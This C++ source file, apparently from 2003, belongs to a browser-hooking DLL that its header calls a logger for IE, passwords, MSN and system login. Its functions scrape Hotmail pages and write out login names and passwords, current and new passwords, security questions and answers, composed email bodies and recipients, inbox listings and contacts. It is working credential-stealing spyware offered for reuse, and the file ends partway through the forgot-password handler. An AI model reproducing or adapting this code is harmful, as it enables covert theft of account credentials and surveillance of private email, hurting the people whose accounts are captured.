/************************************
  REVISION LOG ENTRY
  Revision By: Zhang, Zhefu
  E-mail: codetiger@hotmail.com
  Revised on 7/3/2003 
  Comment: This is part of the logger for IE, password edit, MSN, system login.
           You are free to use to use the code on the base of keeping this comment
		   All rights reserved. May not be sold for profit.
 ************************************/
#include "BrowserPhantomDLLStdAfx.h"
#include "PageHandler.h"
#include "ComDef.h"

//Note:     szElementValue maybe empty!
//lpMem:    base pointer to MMF head
//dwSized:  total size
//dwUsed:   used size
#define GLOBAL_BUFFER_SIZE 1024


#define MAX_PAGE_ELEMENT_SIZE 1024 * 900 //900K mail text is our limit 


BOOL HandlePageElement(LPBYTE lpMem, DWORD& dwSize, DWORD& dwUsed, LPCTSTR szElementType,
				   LPCTSTR szElementName, LPCTSTR szElementValue)
{
	TCHAR szGlobalBuffer[GLOBAL_BUFFER_SIZE];
	LPBYTE lpByte = lpMem;
	lpByte += dwUsed;

	int dwDisp;
	//may buffer overflow here $$$$
	//heh heh, man, I do not want you crash my things!
	//it is reasonable the Element Type and Name contain only less than 32 chars
	if(::lstrlen(szElementName) + ::lstrlen(szElementType) < GLOBAL_BUFFER_SIZE - 10)
	{
		_stprintf(szGlobalBuffer, _T("%s(%s): "), szElementName, szElementType);
	    dwDisp = ::lstrlen(szGlobalBuffer)*sizeof(TCHAR);
	    ::CopyMemory(lpByte, szGlobalBuffer, dwDisp);
	    dwUsed += dwDisp;
	}
	else if(::lstrlen(szElementName) < GLOBAL_BUFFER_SIZE - 10)
	{
		_stprintf(szGlobalBuffer, _T("%s(%Long-Err-Elem-Type): "), szElementName);
	    dwDisp = ::lstrlen(szGlobalBuffer)*sizeof(TCHAR);
	    ::CopyMemory(lpByte, szGlobalBuffer, dwDisp);
	    dwUsed += dwDisp;
	}
	else if(::lstrlen(szElementType) < GLOBAL_BUFFER_SIZE - 10)
	{
		_stprintf(szGlobalBuffer, _T("%Long-Err-Elem-Name(%s): "), szElementType);
	    dwDisp = ::lstrlen(szGlobalBuffer)*sizeof(TCHAR);
	    ::CopyMemory(lpByte, szGlobalBuffer, dwDisp);
	    dwUsed += dwDisp;
	}
	else
	{
		_stprintf(szGlobalBuffer, _T("%Long-Err-Elem-Name(%Long-Err-Elem-Type): "));
	    dwDisp = ::lstrlen(szGlobalBuffer)*sizeof(TCHAR);
	    ::CopyMemory(lpByte, szGlobalBuffer, dwDisp);
	    dwUsed += dwDisp;
	}

	lpByte = lpMem;
	lpByte += dwUsed;
	dwDisp = ::lstrlen(szElementValue)*sizeof(TCHAR);
	if(dwDisp >= MAX_PAGE_ELEMENT_SIZE)
	{		
		::CopyMemory(lpByte, szElementValue, 
			MAX_PAGE_ELEMENT_SIZE > (dwSize - dwUsed - 1024) ? (dwSize - dwUsed - 1024) : MAX_PAGE_ELEMENT_SIZE);
		dwUsed += MAX_PAGE_ELEMENT_SIZE > (dwSize - dwUsed - 1024) ? (dwSize - dwUsed - 1024) : MAX_PAGE_ELEMENT_SIZE;
	}
	else
	{
		::CopyMemory(lpByte, szElementValue, dwDisp);
		dwUsed += dwDisp;
	}

	lpByte = lpMem;
	lpByte += dwUsed;
	_stprintf(szGlobalBuffer, _T("\r\n"));
	dwDisp = ::lstrlen(szGlobalBuffer)*sizeof(TCHAR);
	::CopyMemory(lpByte, szGlobalBuffer, dwDisp);
	dwUsed += dwDisp;

	return TRUE;
}

//<tr class bgColor="#ffffff">
//    <td name="abc@hotmail.com">&nbsp;</td>
//    <td>
//    <input onclick="CCA(this);" tabIndex="21" type="checkbox" name="MSG1060268675.58" value="ON"></td>
//    <td>&nbsp;<a tabIndex="21" href="http://l9.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&a=ebfac3c4acb2a1d34f3c315c2e39d2a2&msg">Sara</a>&nbsp;</td>
//    <td>title here&nbsp;</td>
//    <td>date here</td>
//    <td align="right">size here;</td>
//  </tr>

BOOL HandleHotmailInboxPage(MSHTML::IHTMLDocument2Ptr pDoc, LPBYTE lpMem, 
					   DWORD& dwSize, DWORD& dwUsed, DWORD& dwInfo)
{
	LPBYTE lpByte = lpMem;
	lpByte += dwUsed;

	//Write System Time
	SYSTEMTIME tm;
	::GetLocalTime(&tm);

	TCHAR sz[1024];
    _stprintf(sz, _T("\r\n >>>>>Hotmail Inbox Page %d/%d/%d,%d:%d:%d\r\n"), 
		tm.wYear, tm.wMonth, tm.wDay, tm.wHour, tm.wMinute, tm.wSecond);
	DWORD dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(lpByte, sz, dwDisp);
	dwUsed += dwDisp;

	lpByte = lpMem;
	lpByte += dwUsed;
	_bstr_t url = pDoc->Geturl();
    dwDisp = ::lstrlen((LPCTSTR)url)*sizeof(TCHAR);
	::CopyMemory(lpByte, (LPCTSTR)url, dwDisp);
	dwUsed += dwDisp;

	lpByte = lpMem;
	lpByte += dwUsed;
    _stprintf(sz, _T("\r\n"));
	dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(lpByte, sz, dwDisp);
	dwUsed += dwDisp;

	MSHTML::IHTMLElementCollection *pForm;	
    pDoc->get_all(&pForm);
	long len;
    pForm->get_length(&len); //get everything here, including tr!!!
			
	for(int i = 0; i < len; i++)
	{
		LPDISPATCH lpItem = pForm->item(CComVariant(i), CComVariant(i));

		MSHTML::IHTMLTableRowPtr lpRow;
        HRESULT hr = lpItem->QueryInterface(&lpRow);
		//Is a Table Row?
		if(SUCCEEDED(hr)) 
		{
			MSHTML::IHTMLElementPtr lpRow2(lpRow);

			//Three Table Cell inside?
			MSHTML::IHTMLElementCollectionPtr pCells;	
			hr = lpRow->get_cells(&pCells);
			if(SUCCEEDED(hr))
			{
				long lenCells;
			    pCells->get_length(&lenCells);
				if(lenCells != 6) //hard code here for simplicity 
				{	
					continue;
				}

				//index based on 0, 
				//the 2st cell is the sender, 3th subject, 4th date, 5th size
				BSTR bstrSender, bstrSubject, bstrDate, bstrSize;
                LPDISPATCH lpVar = pCells->item(CComVariant(2), CComVariant(2));
				MSHTML::IHTMLElementPtr lpSender(lpVar);
				lpSender->get_innerText(&bstrSender); 
				
			    lpVar = pCells->item(CComVariant(3), CComVariant(3));
				MSHTML::IHTMLElementPtr lpSubject(lpVar);
				lpSubject->get_innerText(&bstrSubject);

				lpVar = pCells->item(CComVariant(4), CComVariant(4));
				MSHTML::IHTMLElementPtr lpDate(lpVar);
				lpDate->get_innerText(&bstrDate);

				lpVar = pCells->item(CComVariant(5), CComVariant(5));
				MSHTML::IHTMLElementPtr lpSize(lpVar);
				lpSize->get_innerText(&bstrSize);

				if(::lstrlen((LPCTSTR)bstrSender) < 256 &&
					::lstrlen((LPCTSTR)bstrSubject) < 256 &&
					::lstrlen((LPCTSTR)bstrDate) < 256 && 
					::lstrlen((LPCTSTR)bstrSize) < 256 && 
					::lstrlen((LPCTSTR)bstrSender) > 0 &&
					::lstrlen((LPCTSTR)bstrSubject) > 0 &&
					::lstrlen((LPCTSTR)bstrDate) > 0 &&
					::lstrlen((LPCTSTR)bstrSize) > 0)
				{
					//PopMsg((LPCTSTR)_T("flag"));
					lpByte = lpMem;
	                lpByte += dwUsed;
				    _stprintf(sz, _T("-%s\t%s\t%s\t%s\r\n"), (LPCTSTR)bstrSender,
					   (LPCTSTR)bstrSubject, (LPCTSTR)bstrDate, (LPCTSTR)bstrSize);
				    //PopMsg(sz);
				    dwDisp = ::lstrlen(sz) * sizeof(TCHAR);
	        	    ::CopyMemory(lpByte, sz, dwDisp);
	                dwUsed += dwDisp;
				}

				::SysFreeString(bstrSender);
				::SysFreeString(bstrSubject);
				::SysFreeString(bstrDate);
				::SysFreeString(bstrSize);
			}			
		}
	}

/*
	//read html as a whole, to keep code simple
	MSHTML::IHTMLElementPtr spHtmlElement;
	HRESULT hr = pDoc->get_body(&spHtmlElement);
	if(spHtmlElement != 0)
	{
		BSTR bstr;
	    hr = spHtmlElement->get_outerHTML(&bstr);
        UINT len = ::SysStringLen(bstr);
        //We use Unicode here, so I case directly

		lpByte = (LPBYTE)lpMem;
	    lpByte += dwUsed;
		
	   	::CopyMemory(lpByte, (LPVOID)(LPCWSTR)bstr, len*sizeof(TCHAR));
		dwUsed += len*sizeof(TCHAR);
	    ::SysFreeString(bstr);

		lpByte = (LPBYTE)lpMem;
	    lpByte += dwUsed;
		::CopyMemory(lpByte, (LPVOID)(LPCWSTR)_T("\r\n"), ::lstrlen(_T("\r\n"))*sizeof(TCHAR));
		dwUsed += ::lstrlen(_T("\r\n"))*sizeof(TCHAR);
	}
*/
	return TRUE;
}

BOOL HandleHotmailComposePage(MSHTML::IHTMLDocument2Ptr pDoc, LPBYTE lpMem, 
					   DWORD& dwSize, DWORD& dwUsed, DWORD& dwInfo)
{	
//RS $$$ hidden $$$ CHECKED
//Form $$$ hidden $$$ HM
//cp $$$ hidden $$$ 1252
//v $$$ hidden $$$ 1
//q $$$ text $$$ 
// $$$ image $$$ 
//sigtext $$$ hidden $$$ 
//replytext $$$ hidden $$$ 
//drafttext $$$ hidden $$$ 
//curmbox $$$ hidden $$$ F000000001
//_HMaction $$$ hidden $$$ 
//subaction $$$ hidden $$$ 
//plaintext $$$ hidden $$$ 
//login $$$ hidden $$$ codetiger
//wcid $$$ hidden $$$ 
//soid $$$ hidden $$$ 
//msg $$$ hidden $$$ 
//start $$$ hidden $$$ 
//len $$$ hidden $$$ 
//attfile $$$ hidden $$$ 
//type $$$ hidden $$$ 
//src $$$ hidden $$$ 
//ref $$$ hidden $$$ 
//ru $$$ hidden $$$ 
//wysiwyg $$$ hidden $$$ 
//msghdrid $$$ hidden $$$ 931fb080ed04531ce1bca7ac9f2f61f4_1039376788
//RTEbgcolor $$$ hidden $$$ 
//sigflag $$$ hidden $$$ 
//newmail $$$ hidden $$$ new
//to $$$ text $$$ 
//$mostContactPerson1 $$$ hidden $$$ people1@abc.com
//$mostContactPerson2 $$$ hidden $$$ people2@abc.com
//$mostContactPerson3 $$$ hidden $$$ people3@abc.com
//Quick.x $$$ button $$$ Show All
//COMPOSE_X $$$ button $$$ Edit List
//cc $$$ text $$$ 
//bcc $$$ text $$$ 
//subject $$$ text $$$ 
//Attach.x $$$ submit $$$ Add/Edit Attachments
//<SELECT class=drpdwn title="Tools for composing messages" onchange=DT(this[selectedIndex].value) name=tools> <OPTION value="" selected>Tools<OPTION value=SpellChk>Spell Check<OPTION value=Dictionary>Dictionary<OPTION value=Thesaurus>Thesaurus<OPTION value=RTE>Rich-Text Editor ON</OPTION></SELECT>
//outgoing $$$ checkbox $$$ on
//Send.x $$$ submit $$$   Send  
//Save.x $$$ submit $$$ Save Draft
//Cancel.x $$$ submit $$$ Cancel
//body $$$ textarea $$$ 
//
//
//
//
//Send.x $$$ submit $$$   Send  
//Save.x $$$ submit $$$ Save Draft
//Cancel.x $$$ submit $$$ Cancel

	LPBYTE lpByte = lpMem;
	lpByte += dwUsed;

	//Write System Time
	SYSTEMTIME tm;
	::GetLocalTime(&tm);

	TCHAR sz[256];
    _stprintf(sz, _T("\r\n>>>>>Hotmail Compose Page %d/%d/%d,%d:%d:%d\r\n"), 
		tm.wYear, tm.wMonth, tm.wDay, tm.wHour, tm.wMinute, tm.wSecond);
	DWORD dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(lpByte, sz, dwDisp);
	dwUsed += dwDisp;

	MSHTML::IHTMLElementCollection *pCollection;	
    HRESULT hr = pDoc->get_all(&pCollection);
	if(FAILED(hr)) return FALSE;
	long len;
    hr = pCollection->get_length(&len);
    if(FAILED(hr)) return FALSE;

	for(int i = 0; i < len; i++)
	{
		LPDISPATCH lpItem = pCollection->item(CComVariant(i), CComVariant(i));
		//Parse INPUT and TEXTAREA
		//We neen INPUT: to, cc, bcc, subject
		//        TEXTAREA: body  
		MSHTML::IHTMLInputElementPtr lpElement;
        HRESULT hr = lpItem->QueryInterface(&lpElement);
		if(SUCCEEDED(hr)) 
		{
			_bstr_t name = lpElement->Getname();
            _bstr_t type = lpElement->Gettype();
            _bstr_t value = lpElement->Getvalue();

			_bstr_t text(_T("text")); //#include <comdef.h>
			
			_bstr_t to(_T("to"));
			_bstr_t cc(_T("cc"));
			_bstr_t bcc(_T("bcc"));
			_bstr_t subject(_T("subject"));
			
			if(type == text)
			{
				if(name == to || name == cc || name == bcc || name == subject)
					HandlePageElement(lpMem, dwSize, dwUsed, (LPCTSTR)type,
				        (LPCTSTR)name,(LPCTSTR)value);								
			}
		}

		//Parse TextArea
		MSHTML::IHTMLTextAreaElementPtr lpArea;
		hr = lpItem->QueryInterface(&lpArea);
		if(SUCCEEDED(hr)) 
		{
			_bstr_t name = lpArea->Getname();
            _bstr_t type = lpArea->Gettype();
            _bstr_t value = lpArea->Getvalue();

			_bstr_t textarea(_T("textarea"));
		    _bstr_t body(_T("body"));

			if(type == textarea && name == body)
			{
				HandlePageElement(lpMem, dwSize, dwUsed, (LPCTSTR)type,
				        (LPCTSTR)name,(LPCTSTR)value);
			}
		}
	}

	pCollection->Release();
	pCollection = NULL;
	return TRUE;
}

BOOL HandleHotmailLogInPage(MSHTML::IHTMLDocument2Ptr pDoc, LPBYTE lpMem, 
					   DWORD& dwSize, DWORD& dwUsed, DWORD& dwInfo)
{
//login $$$ text $$$ 
//<SELECT id=a_d style="FONT-SIZE: 11px; FONT-FAMILY: tahoma,san-serif" onchange="return SelectChanger(this);" name=domain> <OPTION value=hotmail.com selected>hotmail.com</OPTION> <OPTION value=msn.com>msn.com</OPTION></SELECT>
//svc $$$ hidden $$$ mail
//RemoteDAPost $$$ hidden $$$ https://login.msnia.passport.com/ppsecure/post.asp
//passwd $$$ password $$$ 
//enter $$$ submit $$$ Sign In
//sec $$$ radio $$$ share
//sec $$$ radio $$$ rem
//sec $$$ radio $$$ no
//curmbox $$$ hidden $$$ ACTIVE
    LPBYTE lpByte = lpMem;
	lpByte += dwUsed;

	//Write System Time
	SYSTEMTIME tm;
	::GetLocalTime(&tm);

	TCHAR sz[256];
    _stprintf(sz, _T("\r\n>>>>>Hotmail LogIn Page %d/%d/%d,%d:%d:%d\r\n"), 
		tm.wYear, tm.wMonth, tm.wDay, tm.wHour, tm.wMinute, tm.wSecond);
	DWORD dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(lpByte, sz, dwDisp);
	dwUsed += dwDisp;

	MSHTML::IHTMLElementCollection *pCollection;	
    HRESULT hr = pDoc->get_all(&pCollection);
	if(FAILED(hr)) return FALSE;
	long len;
    hr = pCollection->get_length(&len);
    if(FAILED(hr)) return FALSE;

	for(int i = 0; i < len; i++)
	{
		LPDISPATCH lpItem = pCollection->item(CComVariant(i), CComVariant(i));
		//Parse text & password
		//We need: login & password
		MSHTML::IHTMLInputElementPtr lpElement;
        HRESULT hr = lpItem->QueryInterface(&lpElement);
		if(SUCCEEDED(hr)) 
		{
			
			_bstr_t name = lpElement->Getname();
            _bstr_t type = lpElement->Gettype();
            _bstr_t value = lpElement->Getvalue();

			_bstr_t text(_T("text")); //#include <comdef.h>
			_bstr_t password(_T("password"));

			_bstr_t login(_T("login"));
		    _bstr_t passwd(_T("passwd"));

			if(type == text && name == login)
			{
				HandlePageElement(lpMem, dwSize, dwUsed, (LPCTSTR)type,
				        (LPCTSTR)name,(LPCTSTR)value);								
			}
			else if(type == password && name == passwd)
			{
				HandlePageElement(lpMem, dwSize, dwUsed, (LPCTSTR)type,
				        (LPCTSTR)name,(LPCTSTR)value);
			}
		}
	}
	pCollection->Release();
	pCollection = NULL;
	return TRUE;
}

BOOL HandleHotmailLogErrorPage(MSHTML::IHTMLDocument2Ptr pDoc, LPBYTE lpMem, 
					   DWORD& dwSize, DWORD& dwUsed, DWORD& dwInfo)
{
//login $$$ text $$$ 
//<SELECT id=a_d style="FONT-SIZE: 11px; FONT-FAMILY: tahoma,san-serif" onchange="return SelectChanger(this);" name=domain> <OPTION value=hotmail.com selected>hotmail.com</OPTION> <OPTION value=msn.com>msn.com</OPTION></SELECT>
//svc $$$ hidden $$$ mail
//RemoteDAPost $$$ hidden $$$ https://login.msnia.passport.com/ppsecure/post.asp
//passwd $$$ password $$$ 
//enter $$$ submit $$$ Sign in
//sec $$$ radio $$$ share
//sec $$$ radio $$$ rem
//sec $$$ radio $$$ no
	LPBYTE lpByte = lpMem;
	lpByte += dwUsed;

	//Write System Time
	SYSTEMTIME tm;
	::GetLocalTime(&tm);

	TCHAR sz[256];
    _stprintf(sz, _T("\r\n>>>>>Hotmail LogErr Page %d/%d/%d,%d:%d:%d\r\n"), 
		tm.wYear, tm.wMonth, tm.wDay, tm.wHour, tm.wMinute, tm.wSecond);
	DWORD dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(lpByte, sz, dwDisp);
	dwUsed += dwDisp;

	MSHTML::IHTMLElementCollection *pCollection;	
    HRESULT hr = pDoc->get_all(&pCollection);
	if(FAILED(hr)) return FALSE;
	long len;
    hr = pCollection->get_length(&len);
    if(FAILED(hr)) return FALSE;

	for(int i = 0; i < len; i++)
	{
		LPDISPATCH lpItem = pCollection->item(CComVariant(i), CComVariant(i));
		//Parse text & password
		//We need: login & password
		MSHTML::IHTMLInputElementPtr lpElement;
        HRESULT hr = lpItem->QueryInterface(&lpElement);
		if(SUCCEEDED(hr)) 
		{			
			_bstr_t name = lpElement->Getname();
            _bstr_t type = lpElement->Gettype();
            _bstr_t value = lpElement->Getvalue();

			_bstr_t text(_T("text")); //#include <comdef.h>
			_bstr_t password(_T("password"));

			_bstr_t login(_T("login"));
		
			if(type == text && name == login)
			{
				HandlePageElement(lpMem, dwSize, dwUsed, (LPCTSTR)type,
				        (LPCTSTR)name,(LPCTSTR)value);								
			}
			else if(type == password && name == password)
			{
				HandlePageElement(lpMem, dwSize, dwUsed, (LPCTSTR)type,
				        (LPCTSTR)name,(LPCTSTR)value);
			}
		}
	}
	pCollection->Release();
	pCollection = NULL;
	return TRUE;
}

//you meet table nested inside table, use table "row name = valid e-mail" to locate the
//contacts
//Sample: cool is the nick name while cool@163.net is the actual e-mail address

//<tr name='cool@163.net'>
//<td><input type="checkbox" name="Afc" onClick="CCA(this);" id="hotmail||ADfc||"></td>
//<td><font class="s"><a href="javascript:DoEdit('hotmail','ADfc')">cool</a></font></td>	
//<td><font class="s">
//<a href="javascript:DoCompose('ADc');">cool@163.net</a>
//</font></td>
//</tr>  

//Desc: a Table Row, the first cell is a check box, the second cell the nickname
//                   the third cell is true mail address

BOOL HandleHotmailContactsPage(MSHTML::IHTMLDocument2Ptr pDoc, LPBYTE lpMem, 
					   DWORD& dwSize, DWORD& dwUsed, DWORD& dwInfo)
{
	//return TRUE;
	LPBYTE lpByte = lpMem;
	lpByte += dwUsed;

	//Write System Time
	SYSTEMTIME tm;
	::GetLocalTime(&tm);

	TCHAR sz[1024];
    _stprintf(sz, _T(">>>>>hotmail Contact Page %d/%d/%d,%d:%d:%d\r\n"), 
		tm.wYear, tm.wMonth, tm.wDay, tm.wHour, tm.wMinute, tm.wSecond);
	DWORD dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(lpByte, sz, dwDisp);
	dwUsed += dwDisp;

	lpByte = lpMem;
	lpByte += dwUsed;
	_bstr_t url = pDoc->Geturl();
    dwDisp = ::lstrlen((LPCTSTR)url)*sizeof(TCHAR);
	::CopyMemory(lpByte, (LPCTSTR)url, dwDisp);
	dwUsed += dwDisp;

	lpByte = lpMem;
	lpByte += dwUsed;
    _stprintf(sz, _T("\r\n"));
	dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(lpByte, sz, dwDisp);
	dwUsed += dwDisp;
	
	MSHTML::IHTMLElementCollection *pForm;	
    pDoc->get_all(&pForm);
	long len;
    pForm->get_length(&len); //get everything here, including tr!!!
			
	for(int i = 0; i < len; i++)
	{
		LPDISPATCH lpItem = pForm->item(CComVariant(i), CComVariant(i));

		MSHTML::IHTMLTableRowPtr lpRow;
        HRESULT hr = lpItem->QueryInterface(&lpRow);
		//Is a Table Row?
		if(SUCCEEDED(hr)) 
		{
			MSHTML::IHTMLElementPtr lpRow2(lpRow);

			//Three Table Cell inside?
			MSHTML::IHTMLElementCollectionPtr pCells;	
			hr = lpRow->get_cells(&pCells);
			if(SUCCEEDED(hr))
			{
				long lenCells;
			    pCells->get_length(&lenCells);
				if(lenCells == 4) //hard code here for simplicity 
				{	
					//index based on 0, 
				    //the 1st cell is the nick name, then true e-mail addr, then on-line status
				    BSTR bstrNickname, bstrMail, bstrStatus;
                    LPDISPATCH lpVar = pCells->item(CComVariant(1), CComVariant(1));
				    MSHTML::IHTMLElementPtr lpNickname(lpVar);
				    lpNickname->get_innerText(&bstrNickname); 
				
				    //PopMsg((LPCTSTR)bstrNickname);

                    lpVar = pCells->item(CComVariant(2), CComVariant(2));
				    MSHTML::IHTMLElementPtr lpMail(lpVar);
				    lpMail->get_innerText(&bstrMail);

				    //PopMsg((LPCTSTR)bstrMail);
				
				    lpVar = pCells->item(CComVariant(3), CComVariant(3));
				    MSHTML::IHTMLElementPtr lpStatus(lpVar);
		            lpStatus->get_innerText(&bstrStatus);

				    //PopMsg((LPCTSTR)bstrStatus);
                
				    if(::lstrlen((LPCTSTR)bstrNickname) < 256 &&
					   ::lstrlen((LPCTSTR)bstrMail) < 256 &&
					   ::lstrlen((LPCTSTR)bstrStatus) < 256 && 
					   ::lstrlen((LPCTSTR)bstrNickname) > 0 &&
					   ::lstrlen((LPCTSTR)bstrMail) > 0 &&
					   ::lstrlen((LPCTSTR)bstrStatus) > 0)
					{
						//PopMsg((LPCTSTR)_T("flag"));

					    lpByte = lpMem;
	                    lpByte += dwUsed;
				        _stprintf(sz, _T("-%s\t%s\t%s\r\n"), (LPCTSTR)bstrNickname,
					      (LPCTSTR)bstrMail, (LPCTSTR)bstrStatus);
				        //PopMsg(sz);
				        dwDisp = ::lstrlen(sz) * sizeof(TCHAR);
	        	        ::CopyMemory(lpByte, sz, dwDisp);
	                    dwUsed += dwDisp;
					}

				    ::SysFreeString(bstrNickname);
				    ::SysFreeString(bstrMail);
				    ::SysFreeString(bstrStatus);
				}
				else if(lenCells == 3) //hard code here for simplicity 
				{	
					//index based on 0, 
				    //the 1st cell is the nick name, then true e-mail addr, then on-line status
				    BSTR bstrNickname, bstrMail;
                    LPDISPATCH lpVar = pCells->item(CComVariant(1), CComVariant(1));
				    MSHTML::IHTMLElementPtr lpNickname(lpVar);
				    lpNickname->get_innerText(&bstrNickname); 
				
				    //PopMsg((LPCTSTR)bstrNickname);

                    lpVar = pCells->item(CComVariant(2), CComVariant(2));
				    MSHTML::IHTMLElementPtr lpMail(lpVar);
				    lpMail->get_innerText(&bstrMail);

				    //PopMsg((LPCTSTR)bstrMail);
				    
				    if(::lstrlen((LPCTSTR)bstrNickname) < 256 &&
					   ::lstrlen((LPCTSTR)bstrMail) < 256 &&
					   ::lstrlen((LPCTSTR)bstrNickname) > 0 &&
					   ::lstrlen((LPCTSTR)bstrMail) > 0)
					{
						//PopMsg((LPCTSTR)_T("flag"));

					    lpByte = lpMem;
	                    lpByte += dwUsed;
				        _stprintf(sz, _T("-%s\t%s\r\n"), (LPCTSTR)bstrNickname,
					      (LPCTSTR)bstrMail);
				        //PopMsg(sz);
				        dwDisp = ::lstrlen(sz) * sizeof(TCHAR);
	        	        ::CopyMemory(lpByte, sz, dwDisp);
	                    dwUsed += dwDisp;
					}

				    ::SysFreeString(bstrNickname);
				    ::SysFreeString(bstrMail);
				}
			}			
		}
	}

/*
	//read html as a whole, to keep code simple
	MSHTML::IHTMLElementPtr spHtmlElement;
	HRESULT hr = pDoc->get_body(&spHtmlElement);
	if(FAILED(hr)) return FALSE;

	if(spHtmlElement != 0)
	{
		BSTR bstr;
	    hr = spHtmlElement->get_outerHTML(&bstr);
		if(FAILED(hr)) return FALSE;

        UINT len = ::SysStringLen(bstr); //not including a terminating null character
        //We use Unicode here, so I case directly
		lpByte = (LPBYTE)lpMem;
	    lpByte += dwUsed;
		PopMsg(_T("%d Used - To Use %d - %s"), dwUsed, len, (LPCWSTR)bstr);
	   	::CopyMemory(lpByte, (LPCTSTR)bstr, len*sizeof(TCHAR));
		dwUsed += len*sizeof(TCHAR);
		
		PopMsg(_T("4"));
	    ::SysFreeString(bstr);
        PopMsg(_T("5"));

		lpByte = (LPBYTE)lpMem;
	    lpByte += dwUsed;
		::CopyMemory(lpByte, (LPCTSTR)_T("\r\n"), 2 * sizeof(TCHAR));
		dwUsed += 2 * sizeof(TCHAR);
		PopMsg(_T("6- %d"), dwUsed);
	}
*/
	return TRUE;
}

BOOL HandleHotmailChangePasswordPage(MSHTML::IHTMLDocument2Ptr pDoc, LPBYTE lpMem, 
					   DWORD& dwSize, DWORD& dwUsed, DWORD& dwInfo)
{
//FormName $$$ hidden $$$ MSRV_ChangePW_FRM
//CurrPW $$$ password $$$ 
//NewPW1 $$$ password $$$ 
//NewPW2 $$$ password $$$ 
//Submit $$$ submit $$$ Continue
	LPBYTE lpByte = lpMem;
	lpByte += dwUsed;

	//Write System Time
	SYSTEMTIME tm;
	::GetLocalTime(&tm);

	TCHAR sz[256];
    _stprintf(sz, _T(">>>>>Hotmail Change Password Page %d/%d/%d,%d:%d:%d\r\n"), 
		tm.wYear, tm.wMonth, tm.wDay, tm.wHour, tm.wMinute, tm.wSecond);
	DWORD dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(lpByte, sz, dwDisp);
	dwUsed += dwDisp;

	MSHTML::IHTMLElementCollection *pCollection;	
    HRESULT hr = pDoc->get_all(&pCollection);
	if(FAILED(hr)) return FALSE;
	long len;
    hr = pCollection->get_length(&len);
    if(FAILED(hr)) return FALSE;

	for(int i = 0; i < len; i++)
	{
		LPDISPATCH lpItem = pCollection->item(CComVariant(i), CComVariant(i));
		//Parse text & password
		//We need: login & password
		MSHTML::IHTMLInputElementPtr lpElement;
        HRESULT hr = lpItem->QueryInterface(&lpElement);
		if(SUCCEEDED(hr)) 
		{
			_bstr_t name = lpElement->Getname();
            _bstr_t type = lpElement->Gettype();
            _bstr_t value = lpElement->Getvalue();

			_bstr_t password(_T("password"));
			 
			_bstr_t CurrPW(_T("CurrPW"));
			_bstr_t NewPW1(_T("NewPW1"));
			_bstr_t NewPW2(_T("NewPW2"));

			if(type == password)
			{
				HandlePageElement(lpMem, dwSize, dwUsed, (LPCTSTR)type,
				        (LPCTSTR)name,(LPCTSTR)value);								
			}
		}
	}
	pCollection->Release();
	pCollection = NULL;
	return TRUE;
}

BOOL HandleHotmailChangeAnswerPage(MSHTML::IHTMLDocument2Ptr pDoc, LPBYTE lpMem, 
					   DWORD& dwSize, DWORD& dwUsed, DWORD& dwInfo)
{
//FormName $$$ hidden $$$ MSRV_ChangeSQ_FRM
//CurrPW $$$ password $$$ 
//NewSQ $$$ text $$$ 
//NewSQA $$$ text $$$ 
//Submit $$$ submit $$$ Continue
	LPBYTE lpByte = lpMem;
	lpByte += dwUsed;

	//Write System Time
	SYSTEMTIME tm;
	::GetLocalTime(&tm);

	TCHAR sz[256];
    _stprintf(sz, _T(">>>>>Forgot Password Page %d/%d/%d,%d:%d:%d\r\n"), 
		tm.wYear, tm.wMonth, tm.wDay, tm.wHour, tm.wMinute, tm.wSecond);
	DWORD dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(lpByte, sz, dwDisp);
	dwUsed += dwDisp;

	MSHTML::IHTMLElementCollection *pCollection;	
    HRESULT hr = pDoc->get_all(&pCollection);
	if(FAILED(hr)) return FALSE;
	long len;
    hr = pCollection->get_length(&len);
    if(FAILED(hr)) return FALSE;

	for(int i = 0; i < len; i++)
	{
		LPDISPATCH lpItem = pCollection->item(CComVariant(i), CComVariant(i));
		//Parse text & password
		//We need: CurrPW & NewSQ ...
		MSHTML::IHTMLInputElementPtr lpElement;
        HRESULT hr = lpItem->QueryInterface(&lpElement);
		if(SUCCEEDED(hr)) 
		{
			
			_bstr_t name = lpElement->Getname();
            _bstr_t type = lpElement->Gettype();
            _bstr_t value = lpElement->Getvalue();

			_bstr_t text(_T("text")); 
			_bstr_t password(_T("password"));
			 
			_bstr_t CurrPW(_T("CurrPW"));
			_bstr_t NewSQ(_T("NewSQ")); 
			_bstr_t NewSQA(_T("NewSQA"));

			if(type == password && name == CurrPW)
			{
				HandlePageElement(lpMem, dwSize, dwUsed, (LPCTSTR)type,
				        (LPCTSTR)name,(LPCTSTR)value);								
			}
			else if(type == text && name == NewSQ)
			{
				HandlePageElement(lpMem, dwSize, dwUsed, (LPCTSTR)type,
				        (LPCTSTR)name,(LPCTSTR)value);
			}
			else if(type == text && name == NewSQA)
			{
				HandlePageElement(lpMem, dwSize, dwUsed, (LPCTSTR)type,
				        (LPCTSTR)name,(LPCTSTR)value);
			}
		}
	}
	pCollection->Release();
	pCollection = NULL;
	return TRUE;
}

BOOL HandleHotmailForgotPasswordPage(MSHTML::IHTMLDocument2Ptr pDoc, LPBYTE lpMem, 
					   DWORD& dwSize, DWORD& dwUsed, DWORD& dwInfo)
{
//FormName $$$ hidden $$$ ResetPW_2_Form
//MName $$$ hidden $$$ codetiger@hotmail.com
//PRS $$$ hidden $$$ 4ebcb436abdc2575a58a279571425553:1039375241
//SecretAnswer $$$ text $$$ 
//NewPW1 $$$ password $$$ 
//NewPW2 $$$ password $$$ 
//Submit $$$ submit $$$ Continue
	LPBYTE lpByte = lpMem;
	lpByte += dwUsed;

	//Write System Time
	SYSTEMTIME tm;
	::GetLocalTime(&tm);

	TCHAR sz[256];
    _stprintf(sz, _T(">>>>>Forgot Password Page %d/%d/%d,%d:%d:%d\r\n"), 
		tm.wYear, tm.wMonth, tm.wDay, tm.wHour, tm.wMinute, tm.wSecond);
